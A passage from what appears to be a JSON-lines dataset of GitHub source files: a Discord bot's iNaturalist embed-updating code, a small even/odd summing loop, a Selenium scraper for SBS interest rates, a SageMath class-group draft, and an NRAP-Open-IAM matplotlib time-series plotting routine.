permitted, refetch the message because it may have changed prior to\r\n # acquiring lock\r\n if (\r\n msg.guild\r\n and not msg.channel.permissions_for(msg.guild.me).read_message_history\r\n ):\r\n try:\r\n msg = await msg.channel.fetch_message(msg.id)\r\n except discord.errors.NotFound:\r\n return # message has been deleted, nothing left to do\r\n embeds = msg.embeds\r\n inat_embed = INatEmbed.from_discord_embed(embeds[0])\r\n description = inat_embed.description or \"\"\r\n mat = re.search(counts_pat, description)\r\n if action == \"toggle\":\r\n action = \"remove\" if mat else \"add\"\r\n\r\n if (mat and (action == \"remove\")) or (not mat and (action == \"add\")):\r\n description = await self.update_totals(\r\n description,\r\n taxon,\r\n inat_user,\r\n action,\r\n inat_embed,\r\n counts_pat,\r\n )\r\n if len(description) > MAX_EMBED_DESCRIPTION_LEN:\r\n raise NoRoomInDisplay(\r\n \"No more room for additional users in this display.\"\r\n )\r\n inat_embed.description = description\r\n # Image embeds use the footer for photo attribution.\r\n if not inat_embed.image:\r\n if not inat_embed.has_not_by_users() and re.search(\r\n r\"\\*total\\*\", inat_embed.description\r\n ):\r\n inat_embed.set_footer(\r\n text=\"User counts may not add up to \"\r\n \"the total if they changed since they were added. \"\r\n \"Remove, then add them again to update their counts.\"\r\n )\r\n else:\r\n if not inat_embed.image:\r\n inat_embed.set_footer(text=\"\")\r\n await msg.edit(embed=inat_embed)\r\n\r\n async def update_place_totals(\r\n self, description, taxon, place, action, inat_embed, place_counts_pat\r\n ):\r\n \"\"\"Update the place totals for the embed.\"\"\"\r\n # Add/remove always results in a change to totals, so remove:\r\n description = re.sub(r\"\\n\\[[0-9, \\(\\)]+?\\]\\(.*?\\) \\*total\\*\", \"\", description)\r\n\r\n matches = re.findall(r\"\\n\\[[0-9, \\(\\)]+\\]\\(.*?\\) (.*?)(?=\\n|$)\", description)\r\n count_params = {**inat_embed.params, \"place_id\": place.id}\r\n if action == \"remove\":\r\n # Remove the header if last one and the place's count:\r\n if len(matches) == 1:\r\n description = re.sub(TAXON_PLACES_HEADER_PAT, \"\", description)\r\n description = re.sub(place_counts_pat + r\".*?((?=\\n)|$)\", \"\", description)\r\n else:\r\n # Add the header if first one and the place's count:\r\n if not matches:\r\n description += \"\\n\" + TAXON_PLACES_HEADER\r\n formatted_counts = await format_place_taxon_counts(\r\n self,\r\n place,\r\n taxon,\r\n **count_params,\r\n )\r\n description += \"\\n\" + formatted_counts\r\n\r\n matches = re.findall(\r\n r\"\\n\\[[0-9, \\(\\)]+\\]\\(.*?\\?place_id=(?P\\d+)&.*?\\)\",\r\n description,\r\n )\r\n # Total added only if more than one place:\r\n if len(matches) > 1:\r\n place_ids = \",\".join(matches)\r\n formatted_counts = await format_place_taxon_counts(\r\n self,\r\n place_ids,\r\n taxon,\r\n **count_params,\r\n )\r\n description += f\"\\n{formatted_counts}\"\r\n return description\r\n return description\r\n\r\n async def edit_place_totals_locked(\r\n self, msg, taxon, place, action, place_counts_pat\r\n ):\r\n \"\"\"Update place totals for message locked.\"\"\"\r\n if msg.id not in self.reaction_locks:\r\n self.reaction_locks[msg.id] = asyncio.Lock()\r\n async with self.reaction_locks[msg.id]:\r\n # If permitted, refetch the message because it may have changed prior to\r\n # acquiring lock\r\n if (\r\n msg.guild\r\n and not msg.channel.permissions_for(msg.guild.me).read_message_history\r\n ):\r\n try:\r\n msg = await 
msg.channel.fetch_message(msg.id)\r\n                except discord.errors.NotFound:\r\n                    return  # message has been deleted, nothing left to do\r\n            embeds = msg.embeds\r\n            inat_embed = INatEmbed.from_discord_embed(embeds[0])\r\n            description = inat_embed.description or \"\"\r\n            mat = re.search(place_counts_pat, description)\r\n            if action == \"toggle\":\r\n                action = \"remove\" if mat else \"add\"\r\n\r\n            if (mat and (action == \"remove\")) or (not mat and (action == \"add\")):\r\n                description = await self.update_place_totals(\r\n                    description, taxon, place, action, inat_embed, place_counts_pat\r\n                )\r\n                if len(description) > MAX_EMBED_DESCRIPTION_LEN:\r\n                    raise NoRoomInDisplay(\r\n                        \"No more room for additional places in this display.\"\r\n                    )\r\n                inat_embed.description = description\r\n                if re.search(r\"\\*total\\*\", inat_embed.description):\r\n                    inat_embed.set_footer(\r\n                        text=\"Non-overlapping place counts may not add up to \"\r\n                        \"the total if they changed since they were added. \"\r\n                        \"Remove, then add them again to update their counts.\"\r\n                    )\r\n                else:\r\n                    inat_embed.set_footer(text=\"\")\r\n                await msg.edit(embed=inat_embed)\r\n","repo_name":"dronefly-garden/dronefly","sub_path":"inatcog/embeds/inat.py","file_name":"inat.py","file_ext":"py","file_size_in_byte":61373,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"52"} +{"seq_id":"2656809465","text":"list_numbers = [1,5,8,7,6,8,2,5,2,6,4,8,5,9,8,3,5,4,2,5,6,4]\n\nsum_even = 0\n\nsum_odd = 0\n\nfor number in list_numbers:\n    if number % 2 == 0:\n        sum_even += number\n    else:\n        sum_odd += number\n","repo_name":"Pushpendra-Darky/Total-Python","sub_path":"Day4/for loop/LP_3.py","file_name":"LP_3.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71715651365","text":"\nimport time\nimport openpyxl\nimport datetime\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.chrome.service import Service\nfrom webdriver_manager.chrome import ChromeDriverManager\n\n\nclass SBSTasaDiaria:\n\n    def __init__(self):\n        self.datos = []\n        self.driver = webdriver.Chrome(service=Service(ChromeDriverManager().install()))\n\n    def iniciar_busqueda(self, url):\n        self.driver.get(url)\n        # self.driver.maximize_window()\n\n    def recolectar_datos(self):\n        tam = []\n        time.sleep(2)\n        tamn = self.driver.find_element(By.XPATH, '//table[@class=\"APLI_tabla\"]/tbody/tr[1]/td[2]').text\n        tamex = self.driver.find_element(By.XPATH, '//table[@class=\"APLI_tabla\"]/tbody/tr[7]/td[2]').text\n\n        float_tamn = float(tamn.strip('%'))\n        float_tamex = float(tamex.strip('%'))\n\n        tam.append(float_tamn)\n        tam.append(float_tamex)\n        self.driver.quit()\n\n        return tam\n\n","repo_name":"AlexSebastianSC/Indices-Financieros-WS","sub_path":"src/TasaDiaria.py","file_name":"TasaDiaria.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74900874404","text":"from sage.all import *\nfrom solve_unit_group import compute_S_units\n\n\ndef solve_class_group(k: NumberField):\n    bounded_ideals = get_bounded_prime_ideals(k)\n    S_units = compute_S_units(bounded_ideals)\n    u, v = S_units\n\n# Gets all prime ideals with norm less than Minkowski bound\n# Involves enumerating primes less than this bound\ndef get_bounded_prime_ideals(k: NumberField):\n    # Factor (p) for all primes p less than or equal to 
Minkowski bound\n # Add 1, since prime_range is exclusive of the bound and rounds non-ints down\n primes = prime_range(k.minkowski_bound() + 1)\n\n bounded_ideals = []\n for prime in primes:\n ideal_factors = k.ideal(prime).factor()\n bounded_ideals.extend([ideal_factor[0] for ideal_factor in list(ideal_factors)])\n return bounded_ideals\n\n","repo_name":"jdieter31/Quantum-Class-Group-Computation","sub_path":"class_group_solver.py","file_name":"class_group_solver.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17628098443","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCode to create different time-series visualizations for NRAP-Open-IAM.\n\nLast Modified: June, 2023\n\n@author: Seth King\n@author: Nate Mitchell (Nathaniel.Mitchell@NETL.DOE.GOV)\n@author: Veronika Vasylkivska (Veronika.Vasylkivska@NETL.DOE.GOV)\nLRST (Battelle/Leidos) supporting NETL\n\"\"\"\nimport warnings\nimport logging\nimport math\nimport re\n\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport matplotlib.cbook\nimport matplotlib.colors as clrs\nfrom matk.sampleset import percentile, mean\nfrom .label_setup import (LEGEND_DICT, Y_LABEL_DICT, Y_LABEL_SPLIT_DICT,\n Y_LABEL_2ROWS_DICT, Y_LABEL_2ROWS_SPLIT_DICT,\n TITLE_DICT, TITLE_SPLIT_DICT)\n\n# Ignore futurewarning from numpy about record array subarray copies vs views.\nwarnings.simplefilter(action='ignore', category=FutureWarning)\nwarnings.simplefilter(action='ignore', category=matplotlib.cbook.mplDeprecation)\n\n# Constants used to adjust figure formatting\nDEFAULT_FIG_WIDTH = 13\nDEFAULT_FIG_HEIGHT = 8\nAXIS_LABEL_PAD_REF = 4\nTITLE_PAD_REF = 3\nSINGLE_PLOT_FONTSIZE_ADJUST = 1.5\n\nAX_LINEWIDTH_REF = 1.5\nLINEWIDTH_REF = 2.5\nXTICK_SIZE_REF = 5\nYTICK_SIZE_REF = 5\nXTICK_WIDTH_REF = 1.5\nYTICK_WIDTH_REF = 1.5\n\n# These are used to check if the x and y labels are too long relative to the subplot.\n# These values were found by trial and error.\nMAX_YLABEL_HEIGHT_FRAC = 0.85\nMAX_YLABEL_WIDTH_FRAC = 0.075\n\nMAX_XLABEL_HEIGHT_FRAC = 0.4\nMAX_XLABEL_WIDTH_FRAC = 0.5\n\nMAX_TITLE_HEIGHT_FRAC = 0.1\nMAX_TITLE_WIDTH_FRAC = 0.4\n\nLEGEND_ITEM_THRESH1 = 5\nLEGEND_ITEM_THRESH2 = 10\nLEGEND_ITEM_THRESH3 = 15\nLEGEND_ITEM_THRESH4 = 20\n\nLEGEND_FRAME_ALPHA = 0.5\nLEGEND_COLUMNS = 1\n\n# I purposefully included more than 10 marker styles so that the rotation of\n# marker styles (when plotting a large number of metrics) is desynchronized from\n# the rotation of line colors. The default rotation of 10 line colors is used,\n# then two rotations of darker and lighter versions of the same 10 colors are\n# used. Having the rotations of marker styles and colors desynchronized may\n# help clarify such distinctions. 
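The rotation comment above can be made concrete: with matplotlib's 10-entry default color cycle and the 13 marker styles defined below, the same (color, marker) pairing only recurs after lcm(10, 13) = 130 series. A quick standalone check with itertools:

from itertools import cycle, islice

colors = [f"C{i}" for i in range(10)]  # matplotlib's default color cycle names
markers = ['o', '^', 's', 'd', 'X', 'P', '*', 'p', 'D', 'H', '>', '<', 'v']

seen = set()
for i, pair in enumerate(islice(zip(cycle(colors), cycle(markers)), 200)):
    if pair in seen:
        print(i)  # prints 130, the first repeated combination
        break
    seen.add(pair)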
Most simulations will use many years of data\n# with a 1 year timestep, however, in which case markers may be too close together.\ndefaultMarkerList = ['o', '^', 's', 'd', 'X', 'P', '*', 'p', 'D', 'H',\n                     '>', '<', 'v']\ndefaultLineStyleList = ['solid', 'dotted', 'dashed', 'dashdot']\nhatchList = ['|', '-', '+', 'x', 'o', 'O', '.', '*', '/', '\\\\']\n\ndef time_series_plot(output_names, sm, s, plot_data, output_list, name='Figure 1',\n                     analysis='forward', savefig=None, title=None, subplot=None,\n                     plot_type=None, figsize=None, fontname='Arial',\n                     gen_font_size=10, axis_label_font_size=12,\n                     title_font_size=12, legend_font_size=10, bold_labels=True,\n                     useMathTextOption=True, generate_title=True,\n                     plot_grid_option=True, grid_alpha_val=0.15):\n    \"\"\"\n    Makes time series plots of statistics of data in output_names.\n    Highlights percentiles, mean, and median values.\n\n    :param output_names: List of observation names to match with component models and plot.\n        Examples:\n        output_names=['pressure']\n\n        output_names=['pressure', 'mass_CO2_aquifer1']\n\n        output_names=['pressure', 'CO2_aquifer1', 'CO2_aquifer2']\n    :type output_names: list\n\n    :param sm: OpenIAM System model for which plots are created\n    :type sm: openiam.SystemModel object\n\n    :param s: SampleSet with results of analysis performed on the system model.\n        None for forward analysis.\n    :type s: matk.SampleSet object\n\n    :param plot_data: Dictionary of setup for a given plot\n    :type plot_data: dict\n\n    :param output_list: Dictionary mapping component models to observations\n        Examples:\n        This dictionary only includes pressure from a SimpleReservoir named sres.\n        output_list={sres: 'pressure'}\n\n        This dictionary includes pressure from a SimpleReservoir named sres as well\n        as the mass of CO2 leaked to aquifer 1. The CO2 mass comes from a RateToMassAdapter\n        named adapt.\n        output_list={sres: 'pressure', adapt: 'mass_CO2_aquifer1'}\n\n        This dictionary includes pressure from a SimpleReservoir named sres as well\n        as the CO2 leakage rates to aquifers 1 and 2. The CO2 leakage rates\n        come from a MultisegmentedWellbore named ms.\n        output_list={sres: 'pressure', ms: ['CO2_aquifer1', 'CO2_aquifer2']}\n    :type output_list: dict\n\n    :param name: Figure Name to be used/created.\n    :type name: str\n\n    :param analysis: Type of OpenIAM system analysis performed ('forward',\n        'lhs', or 'parstudy')\n    :type analysis: str\n\n    :param savefig: Filename to save resulting figure to. No file saved if None.\n    :type savefig: str\n\n    :param title: Optional Title for figure\n    :type title: str\n\n    :param subplot: Dictionary for subplot controls, use=True will use\n        subplotting (boolean default=False), ncols=n will use n columns\n        of subplots (positive integer default 1); comp.var_name=sub_title\n        will title the subplot of comp.var_name with sub_title (string default=comp.var_name).\n        Examples:\n        This dictionary creates only one plot (i.e., no subplots). If you are\n        plotting multiple types of metrics (e.g., pressure and CO2 leakage\n        rates), all metrics will be displayed together and only the y axis\n        label for the metric plotted last will be shown. 
Do not use\n this setup in such a case: subplot={'use': False}\n\n This dictionary enables the creation of subplots and specifies\n the use of only one column: subplot={'use': True, 'ncols': 1}\n\n This dictionary includes figure titles for sres.pressure, ms.CO2_aquifer1, and\n ms.CO2_aquifer2.\n subplot={'use': True, 'ncols': 3, 'sres.pressure': 'Pressure at location',\n 'ms.CO2_aquifer1': 'CO$_2$ Leakage Rate to Aquifer 1',\n 'ms.CO2_aquifer2': 'CO$_2$ Leakage Rate to Aquifer 2'}\n :type subplot: dict\n\n :param plot_type: List of 'real' and/or 'stats' plot types to produce.\n 'real' plots realization values\n 'stats' plots quartiles, mean, and median values\n :type plot_type: list of 'real' and/or 'stats'\n\n :param figsize: width and height of the figure (width, height), in inches. Default is\n None, in which case the DEFAULT_FIG_WIDTH and DEFAULT_FIG_HEIGHT are used.\n :type figsize: tuple or NoneType\n\n :param fontname: name of the font type to be used\n :type fontname: str\n\n :param gen_font_size: fontsize for tick labels, etc.\n :type gen_font_size: float or int\n\n :param axis_label_font_size: fontsize for x and y axis labels. These font sizes are\n later updated depending on the figsize and number of subplots.\n :type axis_label_font_size: float or int\n\n :param title_font_size: fontsize for the title. This font size is later\n updated depending on the figsize and number of subplots.\n :type title_font_size: float or int\n\n :param legend_font_size: fontsize for the legend. This font size is later\n updated depending on the figsize.\n :type legend_font_size: float or int\n\n :param bold_labels: option to use bold x and y labels and bold titles. Set to\n True for bold labels, False for normal labels.\n :type bold_labels: bool\n\n :param useMathTextOption: option for the useMathText option for the y axis.\n :type useMathTextOption: bool\n\n :param generate_title: option to enable (True) or disable (False) figure titles.\n If no title is included in the subplot dictionary, a title is created. The\n created title will include location numbers if the variable name includes\n a location (e.g., '001' in 'msw1_001.C02_aquifer1').\n :type generate_title: bool\n\n :param plot_grid_option: option to display a grid (True) or not (False)\n :type plot_grid_option: bool\n\n :param grid_alpha_val: alpha value for the grid\n :type grid_alpha_val: float\n\n :return: None\n \"\"\"\n # Dictionary with variables used to adjust figure formatting\n fig_setup = {'gen_font_size': gen_font_size,\n 'axis_label_font_size': axis_label_font_size,\n 'title_font_size': title_font_size,\n 'legend_font_size': legend_font_size,\n 'line_width': LINEWIDTH_REF,\n 'ax_line_width': AX_LINEWIDTH_REF,\n 'xtick_size': XTICK_SIZE_REF,\n 'ytick_size': YTICK_SIZE_REF,\n 'xtick_width': XTICK_WIDTH_REF,\n 'ytick_width': YTICK_WIDTH_REF,\n 'axis_label_pad': AXIS_LABEL_PAD_REF,\n 'title_pad': TITLE_PAD_REF,\n 'xaxis_font_size': axis_label_font_size,\n 'yaxis_font_size': axis_label_font_size}\n\n selected_keys = ['gen_font_size', 'axis_label_font_size',\n 'title_font_size', 'legend_font_size', 'line_width',\n 'ax_line_width', 'xtick_size', 'ytick_size',\n 'xtick_width', 'ytick_width']\n\n if bold_labels:\n fig_setup['label_font_weight'] = 'bold'\n else:\n fig_setup['label_font_weight'] = 'normal'\n\n if figsize is None:\n figsize = (DEFAULT_FIG_WIDTH, DEFAULT_FIG_HEIGHT)\n else:\n # Scale font sizes to the specified figure size. 
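The figsize-based scaling applied just below deliberately damps the font response: shrinking a figure applies half of the relative reduction to the fonts (factor 0.5*(1 + L2/L1)), while enlarging applies only a quarter of the relative growth (factor 0.25*(3 + L2/L1)). A worked numeric check of those formulas:

def scaled_font(size, L1, L2):
    # Same damped scaling as in the function body below; fonts change
    # less than the figure dimensions do
    ratio = L2 / L1
    if ratio < 1:
        return 0.5 * (1 + ratio) * size
    if ratio > 1:
        return 0.25 * (3 + ratio) * size
    return size

print(scaled_font(12, 13.0, 6.5))   # 9.0: figure halved, fonts only 25% smaller
print(scaled_font(12, 13.0, 26.0))  # 15.0: figure doubled, fonts only 25% larger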
Here, the updated\n # font size scales with the new height or width (relative to the default\n # height or width). This scaling uses the length scale with the largest change\n # relative to the default values (e.g., if height has a larger change, then\n # fontsize is scaled using the specified height value).\n dw_ratio = np.abs(figsize[0] - DEFAULT_FIG_WIDTH)/DEFAULT_FIG_WIDTH\n dh_ratio = np.abs(figsize[1] - DEFAULT_FIG_HEIGHT)/DEFAULT_FIG_HEIGHT\n\n if figsize != (DEFAULT_FIG_WIDTH, DEFAULT_FIG_HEIGHT):\n if dw_ratio > dh_ratio:\n L1 = DEFAULT_FIG_WIDTH\n L2 = figsize[0]\n elif dw_ratio < dh_ratio:\n L1 = DEFAULT_FIG_HEIGHT\n L2 = figsize[1]\n\n # Update the font sizes - some of these are also updated later on, depending\n # on subplot sizes. The fontsize is adjusted depending on the input figsize -\n # sufficiently shrinking the fontsize can be important for small figures, but\n # increasing font sizes in the same way often leads to font that is way too large.\n if (L2 / L1) < 1:\n for key in selected_keys:\n # The formula is simplified based on initial Nate's idea\n fig_setup[key] = 0.5*(1 + L2/L1) * fig_setup[key]\n elif (L2 / L1) > 1:\n for key in selected_keys:\n # The formula is simplified based on initial Nate's idea\n fig_setup[key] = 0.25*(3 + L2/L1) * fig_setup[key]\n\n # These are updated separately depending on the number of rows and columns\n xaxis_font_size_ref = fig_setup['axis_label_font_size']\n yaxis_font_size_ref = fig_setup['axis_label_font_size']\n title_font_size_ref = fig_setup['title_font_size']\n legend_font_size_ref = fig_setup['legend_font_size']\n\n # Update matplotlib figure setup\n update_rc_setup(fig_setup, fontname)\n\n # Find number of subplots\n num_plots = get_number_of_subplots(output_names, output_list)\n\n # Process subplots and their type data\n # subplots_data has the following keys: 'use', 'nrows', 'ncols',\n # 'single_plot', 'type' + (possibly) keys representing titles of subplots\n # if defined by user\n subplots_data = setup_subplots_data(subplot, plot_type, num_plots)\n\n # Initialize indices\n subplot_ind = 1\n color_ind = 0\n reals_ind = 0\n used_colors = []\n markerRef = 0\n lineStyleRef = 0\n hatchRef = 0\n\n useMarkers, useLines, varyLineStyles, figdpi = get_plot_yaml_input(\n plot_data, name)\n\n if not useMarkers:\n markerList = ['None']\n else:\n markerList = defaultMarkerList\n\n if not useLines:\n lineStyleList = ['None']\n varyLineStyles = False\n else:\n lineStyleList = defaultLineStyleList\n\n # Transform time points from days to years\n time = sm.time_array / 365.25\n # Create figure\n fig = plt.figure(num=name, figsize=figsize, dpi=figdpi)\n # Loop over observation names in outputs\n for obs_to_plot in output_names:\n\n # Some of the sizes can be adjusted within the loop, so reset them each time\n fig_setup = reset_sizes(fig_setup, xaxis_font_size_ref, yaxis_font_size_ref,\n title_font_size_ref, legend_font_size_ref)\n xaxis_fontsizes_used = []\n yaxis_fontsizes_used = []\n\n # If this figure has only one plot, slightly increase the font sizes\n # (no risk of overlap with other subplots)\n if subplots_data['single_plot']:\n fig_setup = update_single_plot_setup(fig_setup, fontname)\n\n # List of components providing given observation\n cmpnts_to_process = process_components(obs_to_plot, output_list)\n\n for cmpnt_obj in cmpnts_to_process:\n\n cmpnt_name = cmpnt_obj.name\n full_obs_nm = '.'.join([cmpnt_name, obs_to_plot])\n\n # Add subplot\n ax = plt.subplot(\n subplots_data['nrows'], subplots_data['ncols'], subplot_ind)\n\n if 
not subplots_data['single_plot']:\n subplot_ind += 1\n color_ind = 0\n reals_ind = 0\n used_colors = []\n markerRef = 0\n lineStyleRef = 0\n\n lgnd_label, label, loc_ind = generate_legend_setup(\n obs_to_plot, cmpnt_name, analysis)\n\n colorValReal, colorValStats, used_colors, color_ind, \\\n hatch_check = get_colors(reals_ind, color_ind, used_colors,\n subplots_data)\n\n if useMarkers and not colorValReal is None:\n rgbReal = clrs.to_rgba(colorValReal[:])\n markerEdgeColor = np.array(list(rgbReal[:]))\n markerEdgeColor /= 2\n markerEdgeColor[-1] = 1\n else:\n markerEdgeColor = 'None'\n\n if analysis == 'forward':\n values = sm.collect_observations_as_time_series(\n cmpnt_obj, obs_to_plot)\n ax.plot(time, values, '-', label=label, color=colorValReal,\n marker=markerList[markerRef],\n markeredgecolor = markerEdgeColor,\n linestyle=lineStyleList[lineStyleRef], alpha=0.8,\n linewidth=fig_setup['line_width'])\n reals_ind = reals_ind + 1\n\n elif analysis in ['lhs', 'parstudy']:\n ind_list = list(range(len(time)))\n obs_names = [full_obs_nm + '_{0}'.format(indd)\n for indd in ind_list]\n obs_percentiles = percentile(s.recarray[obs_names],\n [0, 25, 50, 75, 100])\n obs_means = mean(s.recarray[obs_names])\n values = np.array(\n [s.recarray[full_obs_nm + '_'\n + str(indd)] for indd in ind_list])\n\n if 'real' in subplots_data['type']:\n if 'stats' in subplots_data['type']:\n ax.plot(time, values, color=colorValReal,\n marker=markerList[markerRef],\n markeredgecolor = markerEdgeColor,\n linestyle=lineStyleList[lineStyleRef],\n label=label, linewidth=fig_setup['line_width'],\n alpha=0.33, zorder = 0)\n else:\n ax.plot(time, values, color=colorValReal,\n marker=markerList[markerRef],\n markeredgecolor = markerEdgeColor,\n linestyle=lineStyleList[lineStyleRef],\n label=label, linewidth=fig_setup['line_width'],\n alpha=0.8)\n reals_ind = reals_ind + 1\n\n if 'stats' in subplots_data['type']:\n if not hatch_check:\n ax.fill_between(time, obs_percentiles[3, :],\n obs_percentiles[4, :],\n label='Upper and lower quartiles' + lgnd_label,\n color=colorValStats, alpha=0.15)\n ax.fill_between(time, obs_percentiles[1, :],\n obs_percentiles[3, :],\n label='Middle quartiles' + lgnd_label,\n color=colorValStats, alpha=0.3)\n ax.fill_between(time, obs_percentiles[0, :],\n obs_percentiles[1, :],\n color=colorValStats, alpha=0.15)\n ax.plot(time, obs_percentiles[2, :], color=colorValStats,\n label='Median value' + lgnd_label,\n linewidth = fig_setup['line_width'],\n linestyle = ':', alpha=0.8)\n ax.plot(time, obs_means, color=colorValStats,\n label='Mean value' + lgnd_label,\n linewidth = fig_setup['line_width'], alpha=0.8)\n\n elif hatch_check:\n ax.fill_between(time, obs_percentiles[3, :],\n obs_percentiles[4, :],\n label='Upper and lower quartiles' + lgnd_label,\n color=colorValStats, alpha=0.15,\n hatch = hatchList[hatchRef])\n ax.fill_between(time, obs_percentiles[1, :],\n obs_percentiles[3, :],\n label='Middle quartiles' + lgnd_label,\n color=colorValStats, alpha=0.3,\n hatch = hatchList[hatchRef])\n ax.fill_between(time, obs_percentiles[0, :],\n obs_percentiles[1, :],\n color=colorValStats, alpha=0.15,\n hatch = hatchList[hatchRef])\n ax.plot(time, obs_percentiles[2, :], color=colorValStats,\n label='Median value' + lgnd_label,\n linewidth = fig_setup['line_width'],\n linestyle = ':', alpha=0.8)\n ax.plot(time, obs_means, color=colorValStats,\n label='Mean value' + lgnd_label,\n linewidth = fig_setup['line_width'], alpha=0.8)\n hatch_check = False\n hatchRef += 1\n if hatchRef > (len(hatchList) - 1):\n 
hatchRef = 0\n\n color_ind += 1\n\n if useMarkers:\n markerRef += 1\n if markerRef > (len(defaultMarkerList) - 1):\n markerRef = 0\n\n if varyLineStyles:\n lineStyleRef += 1\n if lineStyleRef > (len(defaultLineStyleList) - 1):\n lineStyleRef = 0\n\n if plot_grid_option:\n ax.grid(alpha=grid_alpha_val)\n\n # X LABEL\n fig_setup = adjust_x_label(ax, fig, fig_setup, subplots_data)\n xaxis_fontsizes_used.append(fig_setup['xaxis_font_size'])\n\n # Y LABEL\n fig_setup = adjust_y_label(obs_to_plot, cmpnt_name, ax, fig,\n fig_setup, subplots_data, useMathTextOption)\n yaxis_fontsizes_used.append(fig_setup['yaxis_font_size'])\n\n # TITLE\n sub_title = get_title(obs_to_plot, cmpnt_name, subplots_data, loc_ind)\n\n if generate_title:\n fig_setup = adjust_title(sub_title, ax, fig, fig_setup, subplots_data)\n else:\n # No title\n pass\n\n min_fontsize = make_label_fontsizes_uniform(\n subplot_ind - 1, xaxis_fontsizes_used, yaxis_fontsizes_used,\n subplots_data)\n\n if fig_setup['gen_font_size'] > min_fontsize:\n fig_setup['gen_font_size'] = min_fontsize\n update_rc_setup(fig_setup, fontname)\n\n # Used to reset the legend font size within the loop through the axes.\n # Otherwise, the font size could shrink from one subplot to the next.\n legend_font_size_ref2 = fig_setup['legend_font_size']\n\n if analysis == 'forward':\n ax_list = fig.axes\n for ax in ax_list:\n handle_list = []\n label_list = []\n handles, labels = ax.get_legend_handles_labels()\n\n for handle, label in zip(handles, labels):\n if label not in label_list:\n handle_list.append(handle)\n label_list.append(label)\n\n fig_setup['legend_font_size'] = legend_font_size_ref2\n fig_setup = check_legend(handle_list, fig_setup, min_fontsize,\n subplots_data)\n\n ax.legend(handle_list, label_list, fancybox=False,\n fontsize=fig_setup['legend_font_size'],\n framealpha=fig_setup['legend_framealpha'],\n ncol=fig_setup['legend_columns'])\n\n elif analysis in ['lhs', 'parstudy']:\n ax_list = fig.axes\n for ax in ax_list:\n handle_list = []\n label_list = []\n handles, labels = ax.get_legend_handles_labels()\n for handle, label in zip(handles, labels):\n if label not in label_list:\n handle_list.append(handle)\n label_list.append(label)\n\n fig_setup['legend_font_size'] = legend_font_size_ref2\n fig_setup = check_legend(handle_list, fig_setup, min_fontsize,\n subplots_data)\n\n ax.legend(handle_list, label_list, fancybox=False,\n fontsize=fig_setup['legend_font_size'],\n framealpha=fig_setup['legend_framealpha'],\n ncol=fig_setup['legend_columns'])\n else:\n pass\n\n if title:\n fig.suptitle(title, fontweight=fig_setup['label_font_weight'],\n fontsize=fig_setup['title_font_size'])\n\n # With 3 or more rows, the titles and x-axis labels often overlap.\n if subplots_data['single_plot']:\n fig.subplots_adjust(left=0.15, bottom=0.1, right=0.85, top=0.9,\n wspace=0.1, hspace=0.1)\n elif subplots_data['nrows'] >= 3:\n fig.subplots_adjust(left=0.1, bottom=0.1, right=0.9, top=0.9,\n wspace=0.25, hspace=0.5)\n else:\n fig.subplots_adjust(left=0.1, bottom=0.1, right=0.9, top=0.9,\n wspace=0.25, hspace=0.33)\n\n if savefig:\n try:\n fig.savefig(savefig)\n except ValueError:\n # User has specified plot with a '.' 
in name but no extension.\n # Add .png as output format.\n savefig += '.png'\n fig.savefig(savefig)\n else:\n fig.show()\n\n plt.close()\n # Restore to default matplotlib settings\n # matplotlib.rcdefaults()\n\n\ndef reset_sizes(fig_setup, xaxis_font_size_ref, yaxis_font_size_ref,\n title_font_size_ref, legend_font_size_ref):\n \"\"\"\n Reset some of the sizes to original values\n\n Parameters\n ----------\n fig_setup : dict\n Contains information about sizes of different figure elements.\n\n xaxis_font_size_ref, yaxis_font_size_ref, title_font_size_ref, legend_font_size_ref : float\n Reference font sizes to which the corresponding fig_setup entries are reset.\n\n Returns\n -------\n Updated fig_setup dictionary\n \"\"\"\n fig_setup['xaxis_font_size'] = xaxis_font_size_ref\n fig_setup['yaxis_font_size'] = yaxis_font_size_ref\n fig_setup['title_font_size'] = title_font_size_ref\n fig_setup['legend_font_size'] = legend_font_size_ref\n fig_setup['legend_framealpha'] = LEGEND_FRAME_ALPHA\n fig_setup['legend_columns'] = LEGEND_COLUMNS\n fig_setup['axis_label_pad'] = AXIS_LABEL_PAD_REF\n fig_setup['title_pad'] = TITLE_PAD_REF\n\n return fig_setup\n\n\ndef update_single_plot_setup(fig_setup, fontname):\n \"\"\"\n Update some of the relevant fig_setup entries if single plot (without subplots)\n is to be generated.\n\n Parameters\n ----------\n fig_setup : dict\n Contains information about sizes and properties of different figure elements.\n\n Returns updated dictionary fig_setup\n \"\"\"\n fig_setup['gen_font_size'] *= SINGLE_PLOT_FONTSIZE_ADJUST\n fig_setup['xaxis_font_size'] *= SINGLE_PLOT_FONTSIZE_ADJUST\n fig_setup['yaxis_font_size'] *= SINGLE_PLOT_FONTSIZE_ADJUST\n fig_setup['title_font_size'] *= SINGLE_PLOT_FONTSIZE_ADJUST\n # The legend font sizes can easily become too big, so the initial\n # adjustment is scaled down\n fig_setup['legend_font_size'] = 0.5*fig_setup['legend_font_size']*(\n 1 + SINGLE_PLOT_FONTSIZE_ADJUST)\n value = fig_setup['gen_font_size']\n font = {'family': fontname,\n 'weight': 'normal',\n 'size': value}\n plt.rc('font', **font)\n fig_setup['axis_label_pad'] *= SINGLE_PLOT_FONTSIZE_ADJUST\n fig_setup['title_pad'] *= SINGLE_PLOT_FONTSIZE_ADJUST\n\n return fig_setup\n\n\ndef update_rc_setup(fig_setup, fontname):\n \"\"\"\n Update matplotlib.pyplot parameters using information in the fig_setup and fontname\n arguments.\n\n Parameters\n ----------\n fig_setup : dict\n Contains information about sizes and properties of different figure elements.\n\n fontname : str\n Name of font for figure elements\n\n Returns\n -------\n None.\n \"\"\"\n font = {'family': fontname,\n 'weight': 'normal',\n 'size': fig_setup['gen_font_size']}\n plt.rc('font', **font)\n plt.rcParams['axes.linewidth'] = fig_setup['ax_line_width']\n plt.rcParams['xtick.major.size'] = fig_setup['xtick_size']\n plt.rcParams['ytick.major.size'] = 